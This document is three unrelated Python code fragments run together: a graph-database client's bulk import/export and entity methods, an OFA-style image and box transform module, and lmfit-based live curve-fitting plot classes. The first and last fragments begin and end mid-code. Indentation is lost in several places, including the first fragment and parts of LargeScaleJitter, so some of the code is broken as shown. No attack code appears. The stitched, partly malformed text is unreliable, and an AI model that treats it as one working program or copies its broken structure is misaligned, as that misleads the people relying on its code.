if response.error is not None:
raise response.error
return response.resultList
def endBulkImport(self):
channelResponseWaiter = self._genBCRWaiter()
request: tgpduimpl.EndBulkImportSessionRequest = tgpduimpl.TGMessageFactory.createMessage(
tgpdu.VerbId.EndImportRequest,
authtoken=self.__channel__.authtoken, sessionid=self.__channel__.sessionid)
response: tgpduimpl.PartialImportResponse = self.__channel__.send(request, channelResponseWaiter)
return response.resultList
"""
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// End Bulk Import Stuff //
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
"""
"""
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Begin Bulk Export Stuff //
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
"""
def startExport(self, props: typing.Optional[TGProperties] = None, zip: typing.Optional[str] = None,
isBatch: bool = True):
import tgdb.impl.bulkioimpl as tgbulkimpl
channelResponseWaiter = self._genBCRWaiter()
request: tgpduimpl.BeginExportRequest = tgpduimpl.TGMessageFactory.createMessage(
tgpdu.VerbId.BeginExportRequest, authtoken=self.__channel__.authtoken, sessionid=self.__channel__.sessionid)
request.zipName = zip
request.isBatch = isBatch
request.maxBatchEntities = int(ConfigName.BulkIOEntityBatchSize.defaultvalue)\
if props is None or props[ConfigName.BulkIOEntityBatchSize] is None else\
int(props[ConfigName.BulkIOEntityBatchSize])
response: tgpduimpl.BeginExportResponse = self.__channel__.send(request, channelResponseWaiter)
if response.error is not None:
raise response.error
return tgbulkimpl.BulkExportImpl(self, props, response.typeList, response.numRequests)
def partialExport(self, reqNum: int) -> typing.Tuple[str, bytes, bool, int,
typing.Optional[typing.Tuple[str, typing.List[str]]]]:
channelResponseWaiter = self._genBCRWaiter()
request: tgpduimpl.PartialExportRequest = tgpduimpl.TGMessageFactory.createMessage(
tgpdu.VerbId.PartialExportRequest, authtoken=self.__channel__.authtoken,
sessionid=self.__channel__.sessionid)
request.requestNum = reqNum
response: tgpduimpl.PartialExportResponse = self.__channel__.send(request, channelResponseWaiter)
return response.fileName, response.data, response.hasMore, response.numEntities,\
(response.typeName, response.attrList) if response.newType else None
"""
def startExport(self, props: Optional[TGProperties] = None) -> tgbulk.TGBulkExport:
channelResponseWaiter = self.__genBCRWaiter()
request = tgpduimpl.TGMessageFactory.createMessage(tgpdu.VerbId.BeginBulkExportSessionRequest,
authtoken=self.__channel__.authtoken,
sessionid=self.__channel__.sessionid)
_ = self.__channel__.send(request, channelResponseWaiter)
return tgbulkimpl.BulkExportImpl(self, props)
def beginBatchExportEntity(self, entkind: tgmodel.TGEntityKind, enttype: tgmodel.TGEntityType, batchSize: int) \
-> Tuple[int, List[str]]:
channelResponseWaiter = self.__genBCRWaiter()
request: tgpduimpl.BeginBatchExportEntityRequest = tgpduimpl.TGMessageFactory.createMessage(
tgpdu.VerbId.BeginBatchExportEntityRequest, authtoken=self.__channel__.authtoken,
sessionid=self.__channel__.sessionid)
request.entKind = entkind
request.entType = enttype
request.batchSize = batchSize
response: tgpduimpl.BeginBatchExportEntityResponse = self.__channel__.send(request, channelResponseWaiter)
return response.descriptor, response.columnLabels
def singleBatchExportEntity(self, desc: int) -> Tuple[int, str, bool]:
channelResponseWaiter = self.__genBCRWaiter()
request: tgpduimpl.SingleBatchExportEntityRequest = tgpduimpl.TGMessageFactory.createMessage(
tgpdu.VerbId.SingleBatchExportEntityRequest, authtoken=self.__channel__.authtoken,
sessionid=self.__channel__.sessionid)
request.descriptor = desc
response: tgpduimpl.SingleBatchExportEntityResponse = self.__channel__.send(request, channelResponseWaiter)
return response.numEnts, response.data, response.hasMore
def endBulkExportSession(self):
channelResponseWaiter = self.__genBCRWaiter()
request: tgpduimpl.EndBulkExportSessionRequest = tgpduimpl.TGMessageFactory.createMessage(
tgpdu.VerbId.EndBulkExportSessionRequest, authtoken=self.__channel__.authtoken,
sessionid=self.__channel__.sessionid)
_ = self.__channel__.send(request, channelResponseWaiter)
"""
"""
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// End Bulk Export Stuff //
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
"""
def getEntity(self, key: tgmodel.TGKey, option: tgquery.TGQueryOption = tgquery.DefaultQueryOption) ->\
tgmodel.TGEntity:
channelResponseWaiter = self._genBCRWaiter()
requestMessage: tgpduimpl.GetEntityRequestMessage
retV: tgmodel.TGEntity = None
try:
requestMessage = tgpduimpl.TGMessageFactory.createMessage(tgpdu.VerbId.GetEntityRequest,
authtoken=self.__channel__.authtoken,
sessionid=self.__channel__.sessionid)
requestMessage.command = tgpduimpl.GetEntityCommand.GetEntity
requestMessage.key = key
response: tgpduimpl.GetEntityResponseMessage = self.__channel__.send(requestMessage, channelResponseWaiter)
if response.hasResult:
response.finishReadWith(self.graphObjectFactory)
fetchedEntities = response.fetchedEntities
for id in fetchedEntities:
fetchedEnt: tgmodel.TGEntity = fetchedEntities[id]
if key.matches(fetchedEnt):
retV = fetchedEnt
break
finally:
pass
return retV
def insertEntity(self, entity: tgmodel.TGEntity):
if not entity.isNew:
raise tgexception.TGException("Should only be calling insertEntity on a new entity!")
if entity.virtualId not in self.__removeEntities__:
self.__addEntities__[entity.virtualId] = entity
self.__updateEdge__(entity)
if gLogger.isEnabled(TGLevel.Debug):
gLogger.log(TGLevel.Debug, 'Insert entity called')
def updateEntity(self, entity: tgmodel.TGEntity):
if entity.isNew:
raise tgexception.TGException('Should not be calling update on a new entity!')
if entity.isDeleted:
raise tgexception.TGException('Should not be calling update on an already deleted entity!')
if entity.virtualId not in self.__removeEntities__:
self.__updateEntities__[entity.virtualId] = entity
self.__updateEdge__(entity)
def __updateEdge__(self, entity: tgmodel.TGEntity):
if isinstance(entity, tgentimpl.EdgeImpl):
edge: tgmodel.TGEdge = entity
fr, to = edge.vertices
if not fr.isNew and fr.virtualId not in self.__removeEntities__:
self.__updateEntities__[fr.virtualId] = fr
if not to.isNew and to.virtualId not in self.__removeEntities__:
self.__updateEntities__[to.virtualId] = to
def deleteEntity(self, entity: tgentimpl.AbstractEntity):
if entity.isDeleted:
raise tgexception.TGException('Should not be calling delete on an already deleted entity!')
# Remove any entities added to the add changelist
if entity.virtualId in self.__addEntities__:
del self.__addEntities__[entity.virtualId]
# Remove any entities added to the update changelist
if entity.virtualId in self.__updateEntities__:
del self.__updateEntities__[entity.virtualId]
if entity.isNew:
entity.markDeleted()
else:
self.__removeEntities__[entity.virtualId] = entity
self.__updateEdge__(entity)
def createQuery(self, query: str) -> tgquery.TGQuery:
channelResponseWaiter: tgchannel.TGChannelResponseWaiter
result: int
ret: tgquery.TGQuery = None
channelResponseWaiter = self._genBCRWaiter()
try:
request: tgpduimpl.QueryRequestMessage = tgpduimpl.TGMessageFactory.createMessage(tgpdu.VerbId.QueryRequest,
authtoken=self.__channel__.authtoken,
sessionid=self.__channel__.sessionid)
request.command = tgquery.TGQueryCommand.Create
request.query = query
response: tgpduimpl.QueryResponseMessage = self.__channel__.send(request, channelResponseWaiter)
gLogger.log(TGLevel.Debug, "Send query completed")
result: int = response.result
queryHashId: int = response.queryHashId
if result == 0 and queryHashId > 0: #TODO Create error reporting for query result.
ret = tgqueryimpl.QueryImpl(self, queryHashId)
finally:
pass
return ret
def executeQuery(self, query: typing.Optional[str] | |
# Source: zhaoguangxiang/OFA — detection/segmentation transform utilities
import random
import torch
import torchvision.transforms as T
import torchvision.transforms.functional as F
import numpy as np
from PIL import Image
def crop(image, target, region, delete=True):
    """Crop *image* to *region* = (top, left, height, width) and remap *target*.

    Boxes/polygons are shifted into the crop's coordinate frame and clamped to its
    bounds; masks are sliced. When *delete* is True, annotations whose box/mask
    area collapses to zero inside the crop are dropped from every tracked field.
    Assumes boxes are (x0, y0, x1, y1) in absolute pixels — TODO confirm.
    """
    cropped_image = F.crop(image, *region)
    target = target.copy()
    i, j, h, w = region
    # should we do something wrt the original size?
    target["size"] = torch.tensor([h, w])
    # Fields filtered by the "keep" mask below; box/polygon fields are appended as seen.
    fields = ["labels", "area"]
    if "boxes" in target:
        boxes = target["boxes"]
        max_size = torch.as_tensor([w, h], dtype=torch.float32)
        # Shift into crop coordinates, then clamp each corner into [0, w] x [0, h].
        cropped_boxes = boxes - torch.as_tensor([j, i, j, i])
        cropped_boxes = torch.min(cropped_boxes.reshape(-1, 2, 2), max_size)
        cropped_boxes = cropped_boxes.clamp(min=0)
        area = (cropped_boxes[:, 1, :] - cropped_boxes[:, 0, :]).prod(dim=1)
        target["boxes"] = cropped_boxes.reshape(-1, 4)
        target["area"] = area
        fields.append("boxes")
    if "polygons" in target:
        polygons = target["polygons"]
        num_polygons = polygons.shape[0]
        max_size = torch.as_tensor([w, h], dtype=torch.float32)
        # One (j, i) offset per (x, y) pair in the flattened polygon row.
        start_coord = torch.cat([torch.tensor([j, i], dtype=torch.float32)
                                 for _ in range(polygons.shape[1] // 2)], dim=0)
        cropped_boxes = polygons - start_coord
        cropped_boxes = torch.min(cropped_boxes.reshape(num_polygons, -1, 2), max_size)
        cropped_boxes = cropped_boxes.clamp(min=0)
        target["polygons"] = cropped_boxes.reshape(num_polygons, -1)
        fields.append("polygons")
    if "masks" in target:
        # FIXME should we update the area here if there are no boxes?
        target['masks'] = target['masks'][:, i:i + h, j:j + w]
        fields.append("masks")
    # remove elements for which the boxes or masks that have zero area
    if delete and ("boxes" in target or "masks" in target):
        # favor boxes selection when defining which elements to keep
        # this is compatible with previous implementation
        if "boxes" in target:
            cropped_boxes = target['boxes'].reshape(-1, 2, 2)
            keep = torch.all(cropped_boxes[:, 1, :] > cropped_boxes[:, 0, :], dim=1)
        else:
            keep = target['masks'].flatten(1).any(1)
        for field in fields:
            target[field] = target[field][keep.tolist()]
    return cropped_image, target
def hflip(image, target):
    """Mirror *image* horizontally and remap the target annotations to match."""
    flipped_image = F.hflip(image)
    w, h = image.size
    target = target.copy()
    if "boxes" in target:
        # Mirror x-coordinates and swap x0/x1 so boxes stay in (x0, y0, x1, y1) order.
        mirrored = target["boxes"][:, [2, 1, 0, 3]] * torch.as_tensor([-1, 1, -1, 1]) + torch.as_tensor([w, 0, w, 0])
        target["boxes"] = mirrored
    if "polygons" in target:
        polys = target["polygons"]
        count = polys.shape[0]
        # Mirror every (x, y) vertex; note the result keeps the (N, P, 2) shape.
        target["polygons"] = polys.reshape(count, -1, 2) * torch.as_tensor([-1, 1]) + torch.as_tensor([w, 0])
    if "masks" in target:
        target['masks'] = target['masks'].flip(-1)
    return flipped_image, target
def resize(image, target, size, max_size=None):
    # size can be min_size (scalar) or (w, h) tuple
    """Resize *image* (scalar short-side size or explicit (w, h)) and rescale *target*.

    Scalar sizes preserve aspect ratio, optionally capped by *max_size*;
    boxes, polygons, and area are scaled by the actual ratio achieved.
    """
    def get_size_with_aspect_ratio(image_size, size, max_size=None):
        # Short side becomes `size`, long side follows the aspect ratio, both capped
        # at max_size. NOTE(review): the cap clamps each side independently, which
        # can distort the aspect ratio when it kicks in — confirm intended.
        w, h = image_size
        if (w <= h and w == size) or (h <= w and h == size):
            if max_size is not None:
                max_size = int(max_size)
                h = min(h, max_size)
                w = min(w, max_size)
            return (h, w)
        if w < h:
            ow = size
            oh = int(size * h / w)
        else:
            oh = size
            ow = int(size * w / h)
        if max_size is not None:
            max_size = int(max_size)
            oh = min(oh, max_size)
            ow = min(ow, max_size)
        return (oh, ow)
    def get_size(image_size, size, max_size=None):
        if isinstance(size, (list, tuple)):
            # Caller passed (w, h); F.resize wants (h, w).
            return size[::-1]
        else:
            return get_size_with_aspect_ratio(image_size, size, max_size)
    size = get_size(image.size, size, max_size)
    rescaled_image = F.resize(image, size, interpolation=Image.BICUBIC)
    if target is None:
        return rescaled_image
    # Per-axis ratios actually achieved (PIL size is (w, h)).
    ratios = tuple(float(s) / float(s_orig) for s, s_orig in zip(rescaled_image.size, image.size))
    ratio_width, ratio_height = ratios
    target = target.copy()
    if "boxes" in target:
        boxes = target["boxes"]
        scaled_boxes = boxes * torch.as_tensor([ratio_width, ratio_height, ratio_width, ratio_height])
        target["boxes"] = scaled_boxes
    if "polygons" in target:
        polygons = target["polygons"]
        # One (rw, rh) pair per (x, y) vertex in the flattened polygon row.
        scaled_ratio = torch.cat([torch.tensor([ratio_width, ratio_height])
                                  for _ in range(polygons.shape[1] // 2)], dim=0)
        scaled_polygons = polygons * scaled_ratio
        target["polygons"] = scaled_polygons
    if "area" in target:
        area = target["area"]
        scaled_area = area * (ratio_width * ratio_height)
        target["area"] = scaled_area
    h, w = size
    target["size"] = torch.tensor([h, w])
    if "masks" in target:
        # Mask resizing is intentionally unsupported here.
        assert False
        # target['masks'] = interpolate(
        #     target['masks'][:, None].float(), size, mode="nearest")[:, 0] > 0.5
    return rescaled_image, target
class CenterCrop(object):
    """Deterministically crop the centered ``size`` = (height, width) region."""

    def __init__(self, size):
        self.size = size

    def __call__(self, img, target):
        img_w, img_h = img.size
        out_h, out_w = self.size
        top = int(round((img_h - out_h) / 2.))
        left = int(round((img_w - out_w) / 2.))
        return crop(img, target, (top, left, out_h, out_w))
class ObjectCenterCrop(object):
    """Crop a ``size`` window centered on the first box in ``target['boxes']``, kept inside the image."""

    def __init__(self, size):
        self.size = size

    def __call__(self, img, target):
        img_w, img_h = img.size
        out_h, out_w = self.size
        x0 = float(target['boxes'][0][0])
        y0 = float(target['boxes'][0][1])
        x1 = float(target['boxes'][0][2])
        y1 = float(target['boxes'][0][3])
        cx = (x0 + x1) / 2
        cy = (y0 + y1) / 2
        # Center the window on the box, then shift it back inside the image bounds;
        # delete=False keeps annotations even if they end up with zero area.
        left = max(cx - out_w / 2 + min(img_w - cx - out_w / 2, 0), 0)
        top = max(cy - out_h / 2 + min(img_h - cy - out_h / 2, 0), 0)
        return crop(img, target, (top, left, out_h, out_w), delete=False)
class RandomHorizontalFlip(object):
    """Mirror image and target horizontally with probability ``p``."""

    def __init__(self, p=0.5):
        self.p = p

    def __call__(self, img, target):
        return hflip(img, target) if random.random() < self.p else (img, target)
class RandomResize(object):
    """Resize to a size drawn uniformly from ``sizes``, optionally capped by ``max_size``."""

    def __init__(self, sizes, max_size=None, equal=False):
        assert isinstance(sizes, (list, tuple))
        self.sizes = sizes
        self.max_size = max_size
        self.equal = equal

    def __call__(self, img, target=None):
        chosen = random.choice(self.sizes)
        # equal=True caps at the chosen size itself instead of the configured max.
        cap = chosen if self.equal else self.max_size
        return resize(img, target, chosen, cap)
class ToTensor(object):
    """Convert the PIL image to a tensor; the target dict passes through untouched."""
    def __call__(self, img, target):
        return F.to_tensor(img), target
class Normalize(object):
    """Normalize the image with mean/std and rescale target coordinates to [0, 1]."""
    def __init__(self, mean, std, max_image_size=512):
        # Per-channel statistics for F.normalize.
        self.mean = mean
        self.std = std
        # Divisor used to normalize box coordinates (not the actual image size).
        self.max_image_size = max_image_size
    def __call__(self, image, target=None):
        image = F.normalize(image, mean=self.mean, std=self.std)
        if target is None:
            return image, None
        target = target.copy()
        # h, w = image.shape[-2:]
        h, w = target["size"][0], target["size"][1]
        if "boxes" in target:
            boxes = target["boxes"]
            # NOTE(review): boxes are divided by max_image_size while polygons are
            # divided by the actual (w, h) — confirm this asymmetry is intentional.
            boxes = boxes / self.max_image_size
            target["boxes"] = boxes
        if "polygons" in target:
            polygons = target["polygons"]
            # One (w, h) divisor per (x, y) vertex in the flattened polygon row.
            scale = torch.cat([torch.tensor([w, h], dtype=torch.float32)
                               for _ in range(polygons.shape[1] // 2)], dim=0)
            polygons = polygons / scale
            target["polygons"] = polygons
        return image, target
class Compose(object):
    """Chain several (image, target) transforms into a single callable."""
    def __init__(self, transforms):
        self.transforms = transforms

    def __call__(self, image, target):
        # Thread the (image, target) pair through each transform in order.
        for transform in self.transforms:
            image, target = transform(image, target)
        return image, target

    def __repr__(self):
        parts = [self.__class__.__name__ + "("]
        for transform in self.transforms:
            parts.append("\n")
            parts.append("    {0}".format(transform))
        parts.append("\n)")
        return "".join(parts)
class LargeScaleJitter(object):
"""
implementation of large scale jitter from copy_paste
"""
    def __init__(self, output_size=512, aug_scale_min=0.3, aug_scale_max=2.0):
        """output_size: square output side; aug_scale_min/max: jitter range."""
        # Kept as a 1-element tensor so it composes with tensor math below.
        self.desired_size = torch.tensor([output_size])
        self.aug_scale_min = aug_scale_min
        self.aug_scale_max = aug_scale_max
    def rescale_target(self, scaled_size, image_size, target):
        """Scale boxes/area in ``target`` from ``image_size`` to ``scaled_size``.

        Both sizes are (height, width); ``target`` is copied, not mutated.
        """
        # compute rescaled targets
        image_scale = scaled_size / image_size
        ratio_height, ratio_width = image_scale
        target = target.copy()
        target["size"] = scaled_size
        if "boxes" in target:
            boxes = target["boxes"]
            # Boxes are (x0, y0, x1, y1): x scales by width, y by height.
            scaled_boxes = boxes * torch.as_tensor([ratio_width, ratio_height, ratio_width, ratio_height])
            target["boxes"] = scaled_boxes
        if "area" in target:
            area = target["area"]
            scaled_area = area * (ratio_width * ratio_height)
            target["area"] = scaled_area
        if "masks" in target:
            # Mask rescaling is intentionally unsupported in this pipeline.
            assert False
            masks = target['masks']
            # masks = interpolate(
            #     masks[:, None].float(), scaled_size, mode="nearest")[:, 0] > 0.5
            target['masks'] = masks
        return target
    def crop_target(self, region, target):
        """Crop annotations to ``region`` = (top, left, height, width).

        Boxes are translated and clamped to the crop; entries whose box (or
        mask) ends up with zero area are dropped from every listed field.
        ``target`` is copied, not mutated.
        """
        i, j, h, w = region
        fields = ["labels", "area"]
        target = target.copy()
        target["size"] = torch.tensor([h, w])
        if "boxes" in target:
            boxes = target["boxes"]
            max_size = torch.as_tensor([w, h], dtype=torch.float32)
            # Shift into crop coordinates, then clamp corners into the crop.
            cropped_boxes = boxes - torch.as_tensor([j, i, j, i])
            cropped_boxes = torch.min(cropped_boxes.reshape(-1, 2, 2), max_size)
            cropped_boxes = cropped_boxes.clamp(min=0)
            area = (cropped_boxes[:, 1, :] - cropped_boxes[:, 0, :]).prod(dim=1)
            target["boxes"] = cropped_boxes.reshape(-1, 4)
            target["area"] = area
            fields.append("boxes")
        if "masks" in target:
            # FIXME should we update the area here if there are no boxes?
            target['masks'] = target['masks'][:, i:i + h, j:j + w]
            fields.append("masks")
        # remove elements for which the boxes or masks that have zero area
        if "boxes" in target or "masks" in target:
            # favor boxes selection when defining which elements to keep
            # this is compatible with previous implementation
            if "boxes" in target:
                cropped_boxes = target['boxes'].reshape(-1, 2, 2)
                keep = torch.all(cropped_boxes[:, 1, :] > cropped_boxes[:, 0, :], dim=1)
            else:
                keep = target['masks'].flatten(1).any(1)
            for field in fields:
                target[field] = target[field][keep.tolist()]
        return target
    def pad_target(self, padding, target):
        """Zero-pad masks on the bottom/right; ``padding`` is (pad_h, pad_w)."""
        target = target.copy()
        if "masks" in target:
            target['masks'] = torch.nn.functional.pad(target['masks'], (0, padding[1], 0, padding[0]))
        return target
def __call__(self, image, target=None):
image_size = image.size
image_size = torch.tensor(image_size[::-1])
random_scale = torch.rand(1) * (self.aug_scale_max - self.aug_scale_min) + self.aug_scale_min
scaled_size = (random_scale * self.desired_size).round()
scale = torch.maximum(scaled_size / image_size[0], scaled_size / image_size[1])
scaled_size = (image_size * scale).round().int()
scaled_image = F.resize(image, scaled_size.tolist(), interpolation=Image.BICUBIC)
if target is not None:
target = self.rescale_target(scaled_size, image_size, target)
# randomly crop or pad images
if random_scale >= 1:
# Selects non-zero random offset (x, y) if scaled image is larger than desired_size.
max_offset = scaled_size - self.desired_size
offset = (max_offset * torch.rand(2)).floor().int()
region = (offset[0].item(), offset[1].item(),
self.desired_size[0].item(), self.desired_size[0].item())
output_image = F.crop(scaled_image, *region)
if target is not None:
target = self.crop_target(region, target)
else:
assert False
padding = self.desired_size - scaled_size
output_image = F.pad(scaled_image, [0, 0, padding[1].item(), padding[0].item()])
if target is | |
+ step_percent*(current_plot_limits[1]-x)
yi = y - step_percent*(y-current_plot_limits[2])
yf = y + step_percent*(current_plot_limits[3]-y)
self.ax.axis( (xi, xf, yi, yf) )
self.ax.figure.canvas.draw()
    def add_line(self, x_data, y_data, **kwargs):
        """Plot a new line on this axes, remember it, and refresh the legend."""
        self.current_line, = self.ax.plot(x_data, y_data, **kwargs)
        self.lines.append(self.current_line)
        self.legend = self.ax.legend(loc=0, title=self.legend_title)#.draggable()
class LiveFitPlot_Custom(LiveFitPlot):
    """
    Add a plot to an instance of LiveFit.
    Note: If your figure blocks the main thread when you are trying to
    scan with this callback, call `plt.ion()` in your IPython session.
    Parameters
    ----------
    livefit : LiveFit
        an instance of ``LiveFit``
    legend_keys : list, optional
        The list of keys to extract from the RunStart document and format
        in the legend of the plot. The legend will always show the
        scan_id followed by a colon ("1: "). Each key adds a line to the
        legend.
    xlim : tuple, optional
        passed to Axes.set_xlim
    ylim : tuple, optional
        passed to Axes.set_ylim
    ax : Axes, optional
        matplotib Axes; if none specified, new figure and axes are made.
    scan_range : sequence, optional
        [start, stop] of the scan; when given it overrides the fitted
        data range in ``get_scan_range``.
    All additional keyword arguments are passed through to ``Axes.plot``.
    """
    def __init__(self, livefit, *, legend_keys=None, xlim=None, ylim=None,
                 ax=None, scan_range=None, **kwargs):
        # Default to a thick blue fit curve; caller kwargs take precedence.
        kwargs_update = {
            'color' : 'b' ,
            'linewidth' : 2.5 ,
        }
        kwargs_update.update(kwargs)
        super().__init__(livefit, legend_keys=legend_keys, xlim=xlim, ylim=ylim, ax=ax, **kwargs_update)
        self.y_guess = 0
        self.scan_range = scan_range

    def get_scan_range(self, overscan=0.0):
        """Return (start, stop, span), optionally widened by ``overscan``×span."""
        if self.scan_range is None:
            # NOTE(review): ``self.__x_key`` name-mangles to
            # _LiveFitPlot_Custom__x_key here; if the attribute is set by a
            # base class it mangles differently and this branch would raise
            # AttributeError — confirm this path is actually exercised.
            x_start = np.min(self.livefit.independent_vars_data[self.__x_key])
            x_stop = np.max(self.livefit.independent_vars_data[self.__x_key])
        else:
            x_start = np.min(self.scan_range)
            x_stop = np.max(self.scan_range)
        span = abs(x_stop-x_start)
        x_start -= span*overscan
        x_stop += span*overscan
        return x_start, x_stop, span

    def event(self, doc):
        # Slight kludge (to over-ride possible 'greying out' from LivePlot_Custom.start)
        self.current_line.set_alpha(1.0)
        self.current_line.set_linewidth(2.5)
        self.x0_line.set_alpha(0.5)
        self.x0_line.set_linewidth(2.0)
        self.livefit.event(doc)
        if self.livefit.result is not None:
            #self.y_data = self.livefit.result.best_fit
            #self.x_data = self.livefit.independent_vars_data[self.__x_key]
            # Evaluate the model on a dense grid 25% wider than the scan.
            x_start, x_stop, span = self.get_scan_range(overscan=0.25)
            self.x_data = np.linspace(x_start, x_stop, num=200, endpoint=True, retstep=False)
            self.y_data = self.livefit.result.eval(x=self.x_data)
            self.update_plot()
        # Intentionally override LivePlot.event. Do not call super().

    def start(self, doc):
        super().start(doc)
        # Remove stale x0 markers left over from previous runs.
        for line in self.ax.lines:
            if hasattr(line, 'custom_tag_x0') and line.custom_tag_x0:
                line.remove()
        # A line that denotes the current fit position for x0 (e.g. center of gaussian)
        x_start, x_stop, span = self.get_scan_range(overscan=0.0)
        self.x0_line = self.ax.axvline( (x_start+x_stop)*0.5, color='b', alpha=0.5, dashes=[5,5], linewidth=2.0 )
        self.x0_line.custom_tag_x0 = True

    def update_plot(self):
        # Track the fitted center with the vertical marker line.
        x0 = self.livefit.result.values['x0']
        self.x0_line.set_xdata([x0])
        super().update_plot()
class LiveFit_Custom(LiveFit):
    """
    Fit a model to data using nonlinear least-squares minimization.
    Parameters
    ----------
    model_name : string
        The name of the model to be used in fitting
    y : string
        name of the field in the Event document that is the dependent variable
    independent_vars : dict
        map the independent variable name(s) in the model to the field(s)
        in the Event document; e.g., ``{'x': 'motor'}``
    scan_range : sequence of float
        [start, stop] of the scan; used to seed the initial guesses
    update_every : int or None, optional
        How often to recompute the fit. If `None`, do not compute until the
        end. Default is 1 (recompute after each new point).
    background : string or list of strings, optional
        extra model(s) summed onto the main model (e.g. 'constant', 'linear')
    Attributes
    ----------
    result : lmfit.ModelResult
    """
    def __init__(self, model_name, y, independent_vars, scan_range, update_every=1, background=None):
        self.x_start = min(scan_range)
        self.x_stop = max(scan_range)
        self.x_span = abs(self.x_stop-self.x_start)
        # Map common aliases onto the canonical model names used below.
        substitutions = { 'gaussian': 'gauss', 'lorentzian': 'lorentz', 'squarewave': 'square', 'tophat': 'square', 'rectangular': 'square', 'errorfunction': 'erf' }
        if model_name in substitutions:
            model_name = substitutions[model_name]
        lm_model = self.get_model(model_name)
        init_guess = self.get_initial_guess(model_name)
        # Add additional models (if any)
        if background is not None:
            if type(background) is list:
                for back in background:
                    lm_model += self.get_model(back)
                    init_guess.update(self.get_initial_guess(back))
            else:
                lm_model += self.get_model(background)
                init_guess.update(self.get_initial_guess(background))
        super().__init__(lm_model, y, independent_vars, init_guess=init_guess, update_every=update_every)

    def get_model(self, model_name):
        """Return an ``lmfit.Model`` for the named lineshape.

        Fixed: model names were compared with ``is``, which relies on
        CPython string interning and is not guaranteed (and emits a
        SyntaxWarning on modern Python); ``==`` is the correct comparison.
        An unknown name now raises instead of printing and then crashing
        with a NameError.

        Raises
        ------
        ValueError
            If ``model_name`` is not one of the supported models.
        """
        if model_name == 'gauss':
            def model_function(x, x0, prefactor, sigma):
                return prefactor*np.exp(-(x - x0)**2/(2 * sigma**2))
        elif model_name == 'lorentz':
            def model_function(x, x0, prefactor, gamma):
                return prefactor* (gamma**2) / ( (x-x0)**2 + (gamma**2) )
        elif model_name == 'doublesigmoid':
            def model_function(x, x0, prefactor, sigma, fwhm):
                left = prefactor/( 1 + np.exp( -(x-(x0-fwhm*0.5))/sigma ) )
                right = prefactor/( 1 + np.exp( -(x-(x0+fwhm*0.5))/sigma ) )
                return prefactor*( left - right )
        elif model_name == 'square':
            def model_function(x, x0, prefactor, fwhm):
                # Approximate a top-hat with two steep sigmoids.
                sigma = fwhm*0.02
                left = prefactor/( 1 + np.exp( -(x-(x0-fwhm*0.5))/sigma ) )
                right = prefactor/( 1 + np.exp( -(x-(x0+fwhm*0.5))/sigma ) )
                return prefactor*( left - right )
        elif model_name == 'sigmoid':
            def model_function(x, x0, prefactor, sigma):
                return prefactor/( 1 + np.exp( -(x-x0)/sigma ) )
        elif model_name == 'sigmoid_r':
            def model_function(x, x0, prefactor, sigma):
                return prefactor/( 1 + np.exp( +(x-x0)/sigma ) )
        elif model_name == 'step':
            def model_function(x, x0, prefactor, sigma):
                return prefactor/( 1 + np.exp( -(x-x0)/sigma ) )
        elif model_name == 'step_r':
            def model_function(x, x0, prefactor, sigma):
                return prefactor/( 1 + np.exp( +(x-x0)/sigma ) )
        elif model_name == 'tanh':
            def model_function(x, x0, prefactor, sigma):
                return prefactor*0.5*( np.tanh((x-x0)/sigma) + 1.0 )
        elif model_name == 'tanh_r':
            def model_function(x, x0, prefactor, sigma):
                return prefactor*0.5*( np.tanh(-(x-x0)/sigma) + 1.0 )
        elif model_name == 'erf':
            import scipy
            def model_function(x, x0, prefactor, sigma):
                return prefactor*0.5*( scipy.special.erf((x-x0)/sigma) + 1.0 )
        elif model_name == 'erf_r':
            import scipy
            def model_function(x, x0, prefactor, sigma):
                return prefactor*0.5*( scipy.special.erf(-(x-x0)/sigma) + 1.0 )
        elif model_name == 'constant':
            def model_function(x, offset):
                return x*0 + offset
        elif model_name == 'linear':
            def model_function(x, m, b):
                return m*x + b
        else:
            raise ValueError('ERROR: Model {:s} unknown.'.format(model_name))
        lm_model = lmfit.Model(model_function)
        return lm_model

    def get_initial_guess(self, model_name):
        """Dispatch to the ``initial_guess_<model_name>`` method."""
        return getattr(self, 'initial_guess_{:s}'.format(model_name))()

    def initial_guess_gauss(self):
        # Center in the middle of the scan; width a quarter of the span.
        init_guess = {
            'x0': lmfit.Parameter('x0', (self.x_start+self.x_stop)*0.5, min=self.x_start-self.x_span*0.1, max=self.x_stop+self.x_span*0.1) ,
            'prefactor': lmfit.Parameter('prefactor', 1000, min=0) ,
            'sigma': lmfit.Parameter('sigma', self.x_span*0.25, min=0, max=self.x_span*4) ,
        }
        return init_guess

    def initial_guess_lorentz(self):
        init_guess = {
            'x0': lmfit.Parameter('x0', (self.x_start+self.x_stop)*0.5, min=self.x_start-self.x_span*0.1, max=self.x_stop+self.x_span*0.1) ,
            'prefactor': lmfit.Parameter('prefactor', 1, min=0) ,
            'gamma': lmfit.Parameter('gamma', self.x_span*0.25, min=0, max=self.x_span*4) ,
        }
        return init_guess

    def initial_guess_doublesigmoid(self):
        init_guess = {
            'x0': lmfit.Parameter('x0', (self.x_start+self.x_stop)*0.5, min=self.x_start-self.x_span*0.1, max=self.x_stop+self.x_span*0.1) ,
            'prefactor': lmfit.Parameter('prefactor', 100, min=0) ,
            'sigma': lmfit.Parameter('sigma', self.x_span*0.25, min=0, max=self.x_span) ,
            'fwhm': lmfit.Parameter('fwhm', self.x_span*0.25, min=0, max=self.x_span) ,
        }
        return init_guess

    def initial_guess_square(self):
        init_guess = {
            'x0': lmfit.Parameter('x0', (self.x_start+self.x_stop)*0.5, min=self.x_start-self.x_span*0.1, max=self.x_stop+self.x_span*0.1) ,
            'prefactor': lmfit.Parameter('prefactor', 100, min=0) ,
            'fwhm': lmfit.Parameter('fwhm', self.x_span*0.25, min=0, max=self.x_span) ,
        }
        return init_guess

    def initial_guess_sigmoid(self):
        init_guess = {
            'x0': lmfit.Parameter('x0', (self.x_start+self.x_stop)*0.5, min=self.x_start-self.x_span*0.1, max=self.x_stop+self.x_span*0.1) ,
            'prefactor': lmfit.Parameter('prefactor', 100, min=0) ,
            'sigma': lmfit.Parameter('sigma', self.x_span*0.25, min=0, max=self.x_span*4) ,
        }
        return init_guess

    def initial_guess_sigmoid_r(self):
        return self.initial_guess_sigmoid()

    def initial_guess_step(self):
